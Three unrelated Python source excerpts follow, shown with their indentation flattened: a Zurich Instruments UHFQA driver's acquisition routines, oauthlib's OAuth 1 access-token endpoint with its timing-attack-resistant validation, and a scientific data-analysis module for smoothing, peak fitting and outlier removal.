def print_integration_overview(self) -> None:
msg = '\tIntegration overview \n'
msg += 'Integration mode: {} \n'.format(
self.qas_0_integration_mode())
for i in range(10):
msg += 'Integration source {}: {}\n'.format(
i, self.get('qas_0_integration_sources_{}'.format(i)))
print(msg)
def print_rotations_overview(self) -> None:
msg = '\tRotations overview \n'
for i in range(10):
msg += 'Rotations {}: {}\n'.format(
i, self.get('qas_0_rotations_{}'.format(i)))
print(msg)
def print_thresholds_overview(self) -> None:
msg = '\t Thresholds overview \n'
for i in range(10):
msg += 'Threshold {}: {}\n'.format(
i, self.get('qas_0_thresholds_{}_level'.format(i)))
print(msg)
def print_user_regs_overview(self) -> None:
msg = '\t User registers overview \n'
user_reg_funcs = ['']*16
user_reg_funcs[0] = 'Loop count'
user_reg_funcs[1] = 'Readout mode'
user_reg_funcs[2] = 'Wait delay'
user_reg_funcs[3] = 'Average count'
user_reg_funcs[4] = 'Error count'
for i in range(16):
msg += 'User reg {}: \t{}\t({})\n'.format(
i, self.get('awgs_0_userregs_{}'.format(i)), user_reg_funcs[i])
print(msg)
def print_overview(self) -> None:
"""
Print a readable overview of relevant parameters of the UHFQC.
N.B. This overview is not complete, but combines different
print helpers
"""
self.print_correlation_overview()
self.print_crosstalk_overview()
self.print_deskew_overview()
self.print_integration_overview()
self.print_rotations_overview()
self.print_thresholds_overview()
self.print_user_regs_overview()
##########################################################################
# 'public' functions: acquisition support
##########################################################################
def acquisition(self,
samples=100,
averages=1,
acquisition_time=0.010,
timeout=10,
channels=(0, 1),
mode='rl',
poll=True):
self.timeout(timeout)
self.acquisition_initialize(samples, averages, channels, mode, poll)
if poll:
data = self.acquisition_poll(samples, True, acquisition_time)
else:
data = self.acquisition_get(samples, True, acquisition_time)
self.acquisition_finalize()
return data
def acquisition_initialize(self,
samples,
averages,
loop_cnt = None,
channels=(0, 1),
mode='rl',
poll=True) -> None:
# Define the channels to use and subscribe to them
self._acquisition_nodes = []
# Loop counter of AWG
if loop_cnt is None:
loop_cnt = samples
# Make some checks on the configured AWG program
if samples > 1 and not self._awg_program_features['loop_cnt']:
raise ziUHFQCSeqCError(
'Trying to acquire {} samples using an AWG program that does not use \'loop_cnt\'.'.format(samples))
if averages > 1 and not self._awg_program_features['avg_cnt']:
# Adjust the AWG loop counter according to the configured program
loop_cnt *= averages
if mode == 'rl':
for c in channels:
path = self._get_full_path(
'qas/0/result/data/{}/wave'.format(c))
self._acquisition_nodes.append(path)
if poll:
self.subs(path)
# Enable automatic readout
self.qas_0_result_reset(1)
self.qas_0_result_enable(1)
self.qas_0_result_length(samples)
self.qas_0_result_averages(averages)
ro_mode = 0
else:
for c in channels:
path = self._get_full_path(
'qas/0/monitor/inputs/{}/wave'.format(c))
self._acquisition_nodes.append(path)
if poll:
self.subs(path)
# Enable automatic readout
self.qas_0_monitor_reset(1)
self.qas_0_monitor_enable(1)
self.qas_0_monitor_length(samples)
self.qas_0_monitor_averages(averages)
ro_mode = 1
self.set('awgs_0_userregs_{}'.format(UHFQA_core.USER_REG_LOOP_CNT), loop_cnt)
self.set('awgs_0_userregs_{}'.format(UHFQA_core.USER_REG_RO_MODE), ro_mode)
self.set('awgs_0_userregs_{}'.format(UHFQA_core.USER_REG_AVG_CNT), averages)
if self.wait_dly() > 0 and not self._awg_program_features['wait_dly']:
raise ziUHFQCSeqCError(
'Trying to use a delay of {} using an AWG program that does not use \'wait_dly\'.'.format(self.wait_dly()))
self.set('awgs_0_userregs_{}'.format(UHFQA_core.USER_REG_WAIT_DLY), self.wait_dly())
if poll:
self.subs(self._get_full_path('auxins/0/sample'))
# Generate more dummy data
self.auxins_0_averaging(8)
def acquisition_arm(self, single=True) -> None:
# time.sleep(0.01)
self.awgs_0_single(single)
self.start()
def acquisition_poll(self, samples, arm=True,
acquisition_time=0.010):
"""
Polls the UHFQC for data.
Args:
samples (int): the expected number of samples
arm (bool): if true arms the acquisition, disable when you
need synchronous acquisition with some external dev
acquisition_time (float): time in sec between polls
timeout (float): time in seconds before timeout Error is raised.
"""
data = {k: [] for k, dummy in enumerate(self._acquisition_nodes)}
# Start acquisition
if arm:
self.acquisition_arm()
# Acquire data
gotem = [False]*len(self._acquisition_nodes)
accumulated_time = 0
while accumulated_time < self.timeout() and not all(gotem):
dataset = self.poll(acquisition_time)
# Enable the user to interrupt long (or buggy) acquisitions
try:
check_keyboard_interrupt()
except KeyboardInterrupt as e:
# Finalize acquisition before raising exception
self.acquisition_finalize()
raise e
for n, p in enumerate(self._acquisition_nodes):
if p in dataset:
for v in dataset[p]:
data[n] = np.concatenate((data[n], v['vector']))
if len(data[n]) >= samples:
gotem[n] = True
accumulated_time += acquisition_time
if not all(gotem):
self.acquisition_finalize()
for n, _c in enumerate(self._acquisition_nodes):
if n in data:
print("\t: Channel {}: Got {} of {} samples".format(
n, len(data[n]), samples))
raise TimeoutError("Error: Didn't get all results!")
return data
def acquisition_get(self, samples, arm=True,
acquisition_time=0.010):
"""
Waits for the UHFQC to finish a measurement then reads the data.
Args:
samples (int): the expected number of samples
arm (bool): if true arms the acquisition, disable when you
need synchronous acquisition with some external dev
acquisition_time (float): time in sec between polls
timeout (float): time in seconds before timeout Error is raised.
"""
data = {n: [] for n in range(len(self._acquisition_nodes))}
# Start acquisition
if arm:
self.acquisition_arm()
self.sync()
done = False
start = time.time()
while (time.time()-start) < self.timeout():
status = self.getdeep('awgs/0/sequencer/status')
if status['value'][0] == 0:
done = True
break
if not done:
self.acquisition_finalize()
raise TimeoutError("Error: Didn't get all results!")
gotem = [False for _ in range(len(self._acquisition_nodes))]
for n, p in enumerate(self._acquisition_nodes):
data[n] = self.getv(p)
if len(data[n]) >= samples:
gotem[n] = True
if not all(gotem):
for n in data.keys():
print("\t: Channel {}: Got {} of {} samples".format(
n, len(data[n]), samples))
raise TimeoutError("Error: Didn't get all results!")
return data
def acquisition_finalize(self) -> None:
self.stop()
self.unsubs()
##########################################################################
# Private methods
##########################################################################
def _reset_awg_program_features(self) -> None:
"""
Resets the self._awg_program_features to disable all features. The UHFQC can be configured with a number
of application-specific AWG programs using this driver. However, all the programs share some characteristics that
are described in the _awg_program_features dictionary. For example, all of the programs include a main loop
that runs for a number of iterations given by a user register. This feature is indicated by the 'loop_cnt'
item in the dictionary. In contrast, not all program include an extra loop for the number of averages that
should be done. Therefore, the 'awg_cnt' item in the dictionary is not automatically set. The driver
uses these features to keep track of what the current AWG program can do. It then raises errors in case
the user tries to do something that is not supported.
"""
self._awg_program_features = {
'loop_cnt': False,
'avg_cnt': False,
'wait_dly': False,
'waves': False,
'cases': False,
'diocws': False}
def _get_minimum_holdoff(self):
if self.qas_0_result_averages() == 1:
holdoff = np.max((800, self.qas_0_integration_length(), self.qas_0_delay()+16))/self.clock_freq()
else:
holdoff = np.max((2560, self.qas_0_integration_length(), self.qas_0_delay()+16))/self.clock_freq()
return holdoff
def _set_wait_dly(self, value) -> None:
self.set('awgs_0_userregs_{}'.format(UHFQA_core.USER_REG_WAIT_DLY), value)
def _get_wait_dly(self):
return self.get('awgs_0_userregs_{}'.format(UHFQA_core.USER_REG_WAIT_DLY))
|
|
# -*- coding: utf-8 -*-
"""
oauthlib.oauth1.rfc5849.endpoints.access_token
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module is an implementation of the access token provider logic of
OAuth 1.0 RFC 5849. It validates the correctness of access token requests,
creates and persists tokens as well as create the proper response to be
returned to the client.
"""
import logging
from oauthlib.common import urlencode
from .. import errors
from .base import BaseEndpoint
log = logging.getLogger(__name__)
class AccessTokenEndpoint(BaseEndpoint):
"""An endpoint responsible for providing OAuth 1 access tokens.
Typical use is to instantiate with a request validator and invoke the
``create_access_token_response`` from a view function. The tuple returned
has all information necessary (body, status, headers) to quickly form
and return a proper response. See :doc:`/oauth1/validator` for details on which
validator methods to implement for this endpoint.
"""
def create_access_token(self, request, credentials):
"""Create and save a new access token.
Similar to OAuth 2, indication of granted scopes will be included as a
space separated list in ``oauth_authorized_realms``.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:returns: The token as an urlencoded string.
"""
request.realms = self.request_validator.get_realms(
request.resource_owner_key, request)
token = {
'oauth_token': self.token_generator(),
'oauth_token_secret': self.token_generator(),
# Backport the authorized scopes indication used in OAuth2
'oauth_authorized_realms': ' '.join(request.realms)
}
token.update(credentials)
self.request_validator.save_access_token(token, request)
return urlencode(token.items())
def create_access_token_response(self, uri, http_method='GET', body=None,
headers=None, credentials=None):
"""Create an access token response, with a new request token if valid.
:param uri: The full URI of the token request.
:param http_method: A valid HTTP verb, i.e. GET, POST, PUT, HEAD, etc.
:param body: The request body as a string.
:param headers: The request headers as a dict.
:param credentials: A list of extra credentials to include in the token.
:returns: A tuple of 3 elements.
1. A dict of headers to set on the response.
2. The response body as a string.
3. The response status code as an integer.
An example of a valid request::
>>> from your_validator import your_validator
>>> from oauthlib.oauth1 import AccessTokenEndpoint
>>> endpoint = AccessTokenEndpoint(your_validator)
>>> h, b, s = endpoint.create_access_token_response(
... 'https://your.provider/access_token?foo=bar',
... headers={
... 'Authorization': 'OAuth oauth_token=234lsdkf....'
... },
... credentials={
... 'my_specific': 'argument',
... })
>>> h
{'Content-Type': 'application/x-www-form-urlencoded'}
>>> b
'oauth_token=lsdkfol23w54jlksdef&oauth_token_secret=qwe089234lkjsdf&oauth_authorized_realms=movies+pics&my_specific=argument'
>>> s
200
An response to invalid request would have a different body and status::
>>> b
'error=invalid_request&description=missing+resource+owner+key'
>>> s
400
The same goes for an an unauthorized request:
>>> b
''
>>> s
401
"""
resp_headers = {'Content-Type': 'application/x-www-form-urlencoded'}
try:
request = self._create_request(uri, http_method, body, headers)
valid, processed_request = self.validate_access_token_request(
request)
if valid:
token = self.create_access_token(request, credentials or {})
self.request_validator.invalidate_request_token(
request.client_key,
request.resource_owner_key,
request)
return resp_headers, token, 200
else:
return {}, None, 401
except errors.OAuth1Error as e:
return resp_headers, e.urlencoded, e.status_code
def validate_access_token_request(self, request):
"""Validate an access token request.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:raises: OAuth1Error if the request is invalid.
:returns: A tuple of 2 elements.
1. The validation result (True or False).
2. The request object.
"""
self._check_transport_security(request)
self._check_mandatory_parameters(request)
if not request.resource_owner_key:
raise errors.InvalidRequestError(
description='Missing resource owner.')
if not self.request_validator.check_request_token(
request.resource_owner_key):
raise errors.InvalidRequestError(
description='Invalid resource owner key format.')
if not request.verifier:
raise errors.InvalidRequestError(
description='Missing verifier.')
if not self.request_validator.check_verifier(request.verifier):
raise errors.InvalidRequestError(
description='Invalid verifier format.')
if not self.request_validator.validate_timestamp_and_nonce(
request.client_key, request.timestamp, request.nonce, request,
request_token=request.resource_owner_key):
return False, request
# The server SHOULD return a 401 (Unauthorized) status code when
# receiving a request with invalid client credentials.
# Note: This is postponed in order to avoid timing attacks, instead
# a dummy client is assigned and used to maintain near constant
# time request verification.
#
# Note that early exit would enable client enumeration
valid_client = self.request_validator.validate_client_key(
request.client_key, request)
if not valid_client:
request.client_key = self.request_validator.dummy_client
# The server SHOULD return a 401 (Unauthorized) status code when
# receiving a request with invalid or expired token.
# Note: This is postponed in order to avoid timing attacks, instead
# a dummy token is assigned and used to maintain near constant
# time request verification.
#
# Note that early exit would enable resource owner enumeration
valid_resource_owner = self.request_validator.validate_request_token(
request.client_key, request.resource_owner_key, request)
if not valid_resource_owner:
request.resource_owner_key = self.request_validator.dummy_request_token
# The server MUST verify (Section 3.2) the validity of the request,
# ensure that the resource owner has authorized the provisioning of
# token credentials to the client, and ensure that the temporary
# credentials have not expired or been used before. The server MUST
# also verify the verification code received from the client.
# .. _`Section 3.2`: https://tools.ietf.org/html/rfc5849#section-3.2
#
# Note that early exit would enable resource owner authorization
# verifier enumertion.
valid_verifier = self.request_validator.validate_verifier(
request.client_key,
request.resource_owner_key,
request.verifier,
request)
valid_signature = self._check_signature(request, is_token_request=True)
# log the results to the validator_log
# this lets us handle internal reporting and analysis
request.validator_log['client'] = valid_client
request.validator_log['resource_owner'] = valid_resource_owner
request.validator_log['verifier'] = valid_verifier
request.validator_log['signature'] = valid_signature
# We delay checking validity until the very end, using dummy values for
# calculations and fetching secrets/keys to ensure the flow of every
# request remains almost identical regardless of whether valid values
# have been supplied. This ensures near constant time execution and
# prevents malicious users from guessing sensitive information
v = all((valid_client, valid_resource_owner, valid_verifier,
valid_signature))
if not v:
log.info("[Failure] request verification failed.")
log.info("Valid client:, %s", valid_client)
log.info("Valid token:, %s", valid_resource_owner)
log.info("Valid verifier:, %s", valid_verifier)
log.info("Valid signature:, %s", valid_signature)
return v, request
|
|
import numpy, scipy, scipy.optimize, scipy.interpolate
import h5py
import os, os.path, time, copy
from PnSC_ui import *
#def ndiv(x, nptsoneside=20):
# nptsoneside=max(nptsoneside, 2.)
# gapptsoneside=min(gapptsoneside, nptsoneside-2.)
# for gap in range(gapptsoneside+1):
# starti=numpy.uint32([max(i-(nptsoneside-gap), 0) for i in range(len(arr))])
# stopi=numpy.uint32([min(i+(nptsoneside-gap)+1, len(arr)) for i in range(len(arr))])
# #print [numpy.append(arr[i0:i], arr[i+1:i1]) for i, i0, i1 in zip(range(len(arr)), starti, stopi)][8]
# #print [(((numpy.append(arr[i0:i], arr[i+1:i1]).mean()-arr[i]))**2, (numpy.append(arr[i0:i], arr[i+1:i1]).std()*nsig)**2) for i, i0, i1 in zip(range(len(arr)), starti, stopi)][8]
# arr=numpy.array([(((numpy.append(arr[i0:i], arr[i+1:i1]).mean()-arr[i]))**2<(numpy.append(arr[i0:i], arr[i+1:i1]).std()*nsig)**2 and (arr[i],) or (numpy.append(arr[i0:i], arr[i+1:i1]).mean(),))[0] for i, i0, i1 in zip(range(len(arr)), starti, stopi)], dtype=arr.dtype)
# return arr
def concat_extrap_ends(x, npts, polyorder=1, lowside=True, highside=True):
i=numpy.arange(npts, dtype='float64')
if lowside:
ans=scipy.polyfit(-1*(i+1.), x[:npts], polyorder)
x=numpy.concatenate([scipy.polyval(list(ans), i[::-1]), x])
if highside:
ans=scipy.polyfit(-1*(i[::-1]-1.), x[-1*npts:], polyorder)
x=numpy.concatenate([x, scipy.polyval(list(ans), i)])
return x
def lininterpbetweenregularpoints(existy, interval):
existy=numpy.array(existy)
x=numpy.arange(interval,dtype='float32')/interval
diff=existy[1:]-existy[:-1]
o=numpy.outer(diff,x)
return numpy.concatenate([arr+start for arr,start in zip(o,existy[:-1])]+[existy[-1:]])
def interpwithinarr(existind, existy, order=3, interpplotax=None, interpcols=['k', 'r']):
if order==1:
existind=numpy.array(existind)
diff=existind[1:]-existind[:-1]
if numpy.all(diff==diff[0]):
return lininterpbetweenregularpoints(existy, diff[0])
interind=sorted(list(set(numpy.arange(max(existind)+1))-set(existind)))
yfull=numpy.zeros(max(existind)+1, existy.dtype)
yfull[existind]=existy[:]
yfull[interind]=scipy.interpolate.spline(existind, existy, interind, order=order)
if not interpplotax is None:
interpplotax.plot(existind, existy, interpcols[0])
interpplotax.plot(interind, yfull[interind], interpcols[1])
return yfull
def savgolsmooth(x, nptsoneside=7, order = 4, dx=1.0, deriv=0, binprior=0): #based on scipy cookbook. x is 1-d array, window is the number of points used to smooth the data, order is the order of the smoothing polynomial, will return the smoothed "deriv"th derivative of x
if nptsoneside<=1:
return x
if binprior>1:
origlen=len(x)
x=numpy.array([x[i*binprior:(i+1)*binprior].mean() for i in range(origlen//binprior)])
dx*=binprior
side=numpy.uint16(max(nptsoneside, numpy.ceil(order/2.)))
s=numpy.r_[2*x[0]-x[side:0:-1],x,2*x[-1]-x[-2:-1*side-2:-1]]
# a second order polynomal has 3 coefficients
b = numpy.mat([[k**i for i in range(order+1)] for k in range(-1*side, side+1)])
m = numpy.linalg.pinv(b).A[deriv] #this gives the dth ? of the base array (.A) of the pseudoinverse of b
# precompute the offset values for better performance
offsets = range(-1*side, side+1)
offset_data = zip(offsets, m)
smooth_data=[numpy.array([(weight * s[i + offset]) for offset, weight in offset_data]).sum() for i in xrange(side, len(s) - side)]
smooth_data=numpy.array(smooth_data)/(dx**deriv)
if binprior>1:
ia=numpy.arange(binprior, dtype='float32')/binprior
xr=numpy.concatenate([ia*(b-a)+a for a, b in zip(smooth_data[:-1], smooth_data[1:])])
xr=numpy.concatenate([(smooth_data[1]-smooth_data[0])*ia[:binprior//2]+smooth_data[0], xr, (smooth_data[-1]-smooth_data[-2])*ia[:binprior//2]+smooth_data[-1]])
smooth_data=numpy.concatenate([xr, (smooth_data[-1]-smooth_data[-2])*ia[:origlen-len(xr)]+smooth_data[-1]])
return smooth_data
class fitfcns: #datatuples are x1,x2,...,y
#.finalparams .sigmas .parnames useful, returns fitfcn(x)
def genfit(self, fcn, initparams, datatuple, markstr='unspecified', parnames=[], interaction=0, maxfev=2000, weights=None, optimizerfcn=None):
self.maxfev=maxfev
self.performfit=True
self.initparams=initparams
self.sigmas=scipy.zeros(len(initparams))
self.parnames=parnames
self.finalparams=initparams
self.error=False
if weights is None:
def wts(x):
return 1.
elif weights=='parabolic':
a=(datatuple[0][0]+datatuple[0][-1])/2.0
b=(datatuple[0][-1]-datatuple[0][0])/2.0
def wts(x):
return 1.0+((x-a)/b)**2
def res1(p, x1, y):
return (y-fcn(p, x1))*wts(x1)
def res2(p, x1,x2,y):
return y-fcn(p, x1, x2)
def res3(p, x1,x2,x3, y):
return y-fcn(p, x1, x2, x3)
def res4(p, x1,x2,x3,x4, y):
return y-fcn(p, x1, x2, x3, x4)
resdic={1:res1, 2:res2, 3:res3, 4:res4}
self.resfcn=resdic[len(datatuple)-1]
i=0
for arr in datatuple: #if the numerical data is given as a list or tuple then convert to arrays. regardless convert to float64 because leastsq REQUIRES THIS
datatuple=datatuple[0:i]+tuple([numpy.float64(arr)])+datatuple[i+1:]
i=i+1
while self.performfit:
self.sigmas=scipy.zeros(len(self.finalparams))
if not optimizerfcn is None:
try:
self.finalparams=optimizerfcn(self.resfcn,self.initparams, args=datatuple, maxfun=self.maxfev, xtol=1.e-10, ftol=1.e-10)
self.error=0
except:
self.error=1
else:
fitout = scipy.optimize.leastsq(self.resfcn,self.initparams, args=datatuple, maxfev=self.maxfev, full_output=1)#, warning=False)
self.performfit=False
self.finalparams=fitout[0]
if not fitout[4] in [1, 2]:
print 'Fitting Error ', fitout[4], ' at ', markstr,': ', fitout[3]
self.error=True
else:
#self.finalparams=fitout[0]
self.covmat=fitout[1]
try:
self.sigmas=scipy.array([self.covmat[i, i] for i in range(len(self.sigmas))])
except:
pass
def fitfcn(x):
return fcn(self.finalparams, x)
return fitfcn
def poly(self, p, x):#both must be numpy arrays
return numpy.array([p[i]*(x**i) for i in range(p.size)]).sum(0)
def polyfit(self, datatuple, initparams, markstr='unspecified', interaction=0, maxfev=2000, weights=None):
#initparams can be an array of coefficients [constant,lin term, quad term,...] or an integer indicating the order of the polynomial
if isinstance(initparams, int):
initparams=numpy.ones(initparams+1)
else:
initparams=numpy.float64(initparams)
parnames=[]
i=0
for par in initparams:
parnames+=[''.join(('coef', `i`))]
i+=1
return self.genfit(self.poly, initparams, datatuple, markstr, parnames, interaction, maxfev, weights=weights)
def gaussianfit(self, datatuple, initparams=scipy.array([1, 0, 1]), markstr='unspecified', interaction=0, showplot=True, maxfev=2000, weights=None):
return self.genfit(self.gaussian, initparams, datatuple, markstr, parnames=['coef', 'center', 'sigma'], interaction=interaction, maxfev=maxfev, weights=weights)
def gaussian(self, p, x):
return p[0]*scipy.exp(-0.5*((x-p[1])/p[2])**2)
def lorentzianfit(self, datatuple, initparams=scipy.array([1, 0, 1]), markstr='unspecified', interaction=0, showplot=True, maxfev=2000, weights=None):
return self.genfit(self, self.lorentzian, initparams, datatuple, markstr, parnames=['coef', 'center', 'gamma'], interaction=interaction, maxfev=maxfev, weights=weights)
def lorentzian(self, p, x):
return (p[0]/scipy.pi)*p[2]/((x-p[1])**2+p[2]**2)
def Gaussian(pars, x):
return pars[2]*numpy.exp(-0.5*((x-pars[0])/pars[1])**2)
def Lorentzian(pars, x):#defined in nontraditional way so that pars[2] is the peak height
return pars[2]/(1+((x-pars[0])/pars[1])**2)
def GaussLorentz(pars, x):
gw=min(max(pars[3], 0.), 1.)
return gw*Gaussian(pars, x)+(1.-gw)*Lorentzian(pars, x)
def GaussHalfLorentz(pars, x):
return .5*Gaussian(pars, x)+.5*Lorentzian(pars, x)
PeakFcnLibrary={'Gaussian':Gaussian, 'Lorentzian':Lorentzian, 'GaussHalfLorentz':GaussHalfLorentz}
def fitpeakset(X, Y, initpars, peakfcn, negpeaks=True, optimizerfcn=None, nsigcut=3.):#peak function must be a function that accepts a list of 3 parameters (the reshape 3 needs to be changed if num params differs)
numgauss=len(initpars)
if numgauss==0:
return (numpy.float32([]), numpy.float32([]), 0.)
if nsigcut is None:
imin=0
imax=len(X)
else:
xmin=initpars[0][0]
xmax=initpars[0][0]
for p, w, h in initpars:
xmin=min(xmin, p-w*nsigcut)
xmax=max(xmax, p+w*nsigcut)
imin=numpy.argmin((X-xmin)**2)
imax=numpy.argmin((X-xmax)**2)
zeroedpeakinds=[]
repeatwithpkremoved=True #peaks are removed if their fitted height is <0. At the end, these peaks are added to the fit parameter list with 0 height and 0 error
while repeatwithpkremoved:
initparscpy=copy.copy(list(initpars))
for pkind in reversed(zeroedpeakinds):#reverse so opo gets the right index
initparscpy.pop(pkind)
if len(initparscpy)==0:
break
initparsflat=numpy.float64(initparscpy).flatten()
def fitfcn(p, x):
allpars=numpy.reshape(p, (p.size//initpars.shape[1], initpars.shape[1]))
if isinstance(x, numpy.ndarray):
val=numpy.zeros(x.size, dtype='float32')
else:
val=0.0
for pars in allpars:
val+=peakfcn(pars, x)
return val
# def residfcn(p, x, y):
# err=y-fitfcn(p, x)
# return err
Ya=numpy.float64(Y[imin:imax])
Xa=numpy.float64(X[imin:imax])
#if not optimizerfcn is None:
ff=fitfcns()
ff.genfit(fitfcn, initparsflat, (Xa, Ya), optimizerfcn=optimizerfcn)
finalparams=ff.finalparams
# else:
# fitout=scipy.optimize.leastsq(residfcn, initparsflat, args=(X, Y), full_output=1)
# if not (fitout[4] in [1, 2]):
# print 'Fitting Error', fitout[4],': ', fitout[3]
# finalparams=numpy.float32(fitout[0])
finalparamsshaped=numpy.reshape(finalparams, (len(finalparams)//initpars.shape[1], initpars.shape[1]))
if negpeaks:
repeatwithpkremoved=False
else:
negpeakinds=numpy.where(finalparamsshaped[:, 2]<0)[0]
zeroedpeakinds+=list(negpeakinds)
zeroedpeakinds.sort()
repeatwithpkremoved=len(negpeakinds)>0
# print '^^^^^^^^^^^^^^^'
# print initparsflat
# print finalparamsshaped
# pylab.plot(X, Y, 'b.')
# pylab.show()
# if not (fitout[1] is None):
# covmat=fitout[1]
# sigmas=numpy.float32([covmat[i, i] for i in range(len(finalparams))])
# else:
# print 'COVARIANCE NOT CALCULATED:', fitout[4],': ', fitout[3]
# sigmas=numpy.zeros(len(finalparams), dtype='float32')
sigmas=ff.sigmas
finalresid=numpy.sqrt((ff.resfcn(finalparams, X, Y)**2).sum())
#pylab.plot(X, Y, 'k.', X, fitfcn(finalparams, X), 'r-')
sigmashaped=numpy.reshape(sigmas, (len(finalparams)//initpars.shape[1], initpars.shape[1]))
for pkind in zeroedpeakinds:
finalparamsshaped=list(finalparamsshaped)
sigmashaped=list(sigmashaped)
temp=copy.copy(initpars[pkind][:])
temp[2]=0.#zero the height
finalparamsshaped.insert(pkind, temp)
sigmashaped.insert(pkind, numpy.zeros(initpars.shape[1], dtype='float64'))
finalparamsshaped=numpy.float64(finalparamsshaped)
sigmashaped=numpy.float64(sigmashaped)
return (finalparamsshaped, sigmashaped, finalresid)
def arrayzeroind1d(arr, postoneg=False, negtopos=True):
sarr=numpy.sign(arr)
if postoneg:
zeroind=numpy.where(sarr[:-1]>sarr[1:])[0]
if negtopos:
zeroind=numpy.append(zeroind, numpy.where(sarr[:-1]*sarr[1:]<=0)[0])
else:#assume that if not postoneg then negtopos
zeroind=numpy.where(sarr[:-1]*sarr[1:]<=0)[0]
return (1.0*zeroind*arr[(zeroind+1,)]-(zeroind+1)*arr[(zeroind,)])/(arr[(zeroind+1,)]-arr[(zeroind,)]) #returns array of the floating point "index" linear interpolation between 2 indeces
def clustercoordsbymax1d(arr, pkind, critsepind):#results will be sorted. wherever there are peak indeces too close together. the peak index next to the peak index with highest arr value gets removed
pkind.sort()
indindslow=numpy.where((pkind[1:]-pkind[:-1])<critsepind)[0]
indindshigh=indindslow+1
while indindslow.size>0:
maxindindindlow=numpy.nanargmax(arr[pkind[(indindslow,)]])
maxindindindhigh=numpy.nanargmax(arr[pkind[(indindshigh,)]])
if arr[pkind[indindslow[maxindindindlow]]]>arr[pkind[indindshigh[maxindindindhigh]]]:
pkind=numpy.delete(pkind, indindshigh[maxindindindlow])
else:
pkind=numpy.delete(pkind, indindslow[maxindindindhigh])
indindslow=numpy.where((pkind[1:]-pkind[:-1])<critsepind)[0]
indindshigh=indindslow+1
return pkind
def peaksearch1dSG(x, dx=1., critpeakheight=10, critsepind=5, critcurve=None, firstdernpts=7, firstderorder=1, secdernpts=14, secderorder=1, pospeaks=True, negpeaks=True):
#dx is delta q for one index. zeros of the first derivative of inn are grouped together if within critsepind. only negative slope in the firstder is used so no secder is necessary unless specify a critical curvature in count nm^2
if not (pospeaks or negpeaks):
return numpy.float32([])
ifirstder=savgolsmooth(x, nptsoneside=firstdernpts, order=firstderorder, dx=dx, deriv=1)
fullpkind=numpy.float32([])
if pospeaks:
zeroind=arrayzeroind1d(ifirstder, postoneg=True, negtopos=False)
temp=numpy.where(x[(numpy.uint32(numpy.round(zeroind)),)]>critpeakheight)
fullpkind=numpy.append(fullpkind, zeroind[temp])
if negpeaks:
zeroind=arrayzeroind1d(ifirstder, postoneg=False, negtopos=True)
temp=numpy.where(x[(numpy.uint32(numpy.round(zeroind)),)]<(-1*critpeakheight))
fullpkind=numpy.append(fullpkind, zeroind[temp])
if fullpkind.size==0:
return fullpkind
pkind=clustercoordsbymax1d(x, numpy.uint32(numpy.round(fullpkind)), critsepind)
if critcurve is not None:
isecder=savgolsmooth(x, nptsoneside=secdernpts, order=secderorder, dx=dx, deriv=2)
temp=numpy.where(numpy.abs(isecder[(numpy.uint32(numpy.round(pkind)),)])>(critcurve))
pkind=numpy.array(pkind)[temp]
# pkind=list(pkind)
# pkind.reverse()#highest to smallest for pairing below
return numpy.array(pkind, dtype=numpy.float32)
def removeoutliers_meanstd(arr, nptsoneside, nsig, gapptsoneside=0): #avrages maximum of 2*nptoneside points and usees distance from mean scaled by std compared to nsig to determine if the value should be replaced by the mean. if gapptsoneside>0, will do this leaving a gap around the point in question and using nptsoneside-gaps points for the mean and std
if nptsoneside==1 and gapptsoneside==0:
return removesinglepixoutliers(arr, critratiotoneighbors=nsig)
nsig=max(nsig, 1.)
nptsoneside=max(nptsoneside, 2.)
gapptsoneside=min(gapptsoneside, nptsoneside-2.)
for gap in range(gapptsoneside+1):
starti=numpy.uint32([max(i-(nptsoneside-gap), 0) for i in range(len(arr))])
stopi=numpy.uint32([min(i+(nptsoneside-gap)+1, len(arr)) for i in range(len(arr))])
#print [numpy.append(arr[i0:i], arr[i+1:i1]) for i, i0, i1 in zip(range(len(arr)), starti, stopi)][8]
#print [(((numpy.append(arr[i0:i], arr[i+1:i1]).mean()-arr[i]))**2, (numpy.append(arr[i0:i], arr[i+1:i1]).std()*nsig)**2) for i, i0, i1 in zip(range(len(arr)), starti, stopi)][8]
arr=numpy.array([(((numpy.append(arr[i0:i], arr[i+1:i1]).mean()-arr[i]))**2<(numpy.append(arr[i0:i], arr[i+1:i1]).std()*nsig)**2 and (arr[i],) or (numpy.append(arr[i0:i], arr[i+1:i1]).mean(),))[0] for i, i0, i1 in zip(range(len(arr)), starti, stopi)], dtype=arr.dtype)
return arr
def removesinglepixoutliers(arr,critratiotoneighbors=1.5):
c=numpy.where((arr[1:-1]>(critratiotoneighbors*arr[:-2]))*(arr[1:-1]>(critratiotoneighbors*arr[2:])))
c0=c[0]+1
#print len(c0), ' pixels being replaced'
arr[c0]=(arr[c0-1]+arr[c0+1])/2
return arr
def findlocmax(arr, critval=0.):
inds=numpy.where((arr[1:-1]>arr[:-2]) & (arr[1:-1]>arr[2:]) & (arr[1:-1]>critval))
return inds[0]+1
def CalcR0_segdict(d, critrelstd=0.02, AveBeforeDivision=True, dzero=None):
amps=d['samplecurrent']#2d arrays of ncycles x npts
volts=d['samplevoltage']
if not dzero is None:
i0=dzero['samplecurrent'].mean()
v0=dzero['samplevoltage'].mean()
print 'zero baseline of %.2e A, %.2e V subtracted' %(i0, v0)
amps=amps-i0
volts=volts-v0
if AveBeforeDivision:
ro_cycles=numpy.float32([v.mean()/a.mean() for a, v in zip(amps, volts)])
else:
inds=numpy.where(amps<=0.)
amps=replacevalswithneighsin2nddim(amps, inds)
volts=replacevalswithneighsin2nddim(volts, inds)
ro_cycles=(volts/amps).mean(axis=1)
if (ro_cycles.std()/ro_cycles.mean())>critrelstd:
print 'The relative variation in the measured Ro from the %d cycles is unexpectedly high: %.3f' %(amps.shape[0], ro_cycles.std()/ro_cycles.mean()) #this is a nice way to do number->string formatting, see the internet for details. amps.shape is a tuple where each element givews the length of the array inthat dimension so amps.shape[0] is the number of cycles
newro_cycles=[r for r in ro_cycles if abs((r-ro_cycles.mean()))<ro_cycles.std()]# this is a filtering for statement. read from left to right starting with "for". We see that we will iterate over newro_cycles and r will be the value in each iteration but the command in the for loop is only going to execute provided the if statement is True. The if statement checks if r is within 1 std dev of the mean. The "command in the for loop" is just to place the r value so the result is a list that does not include the outliers
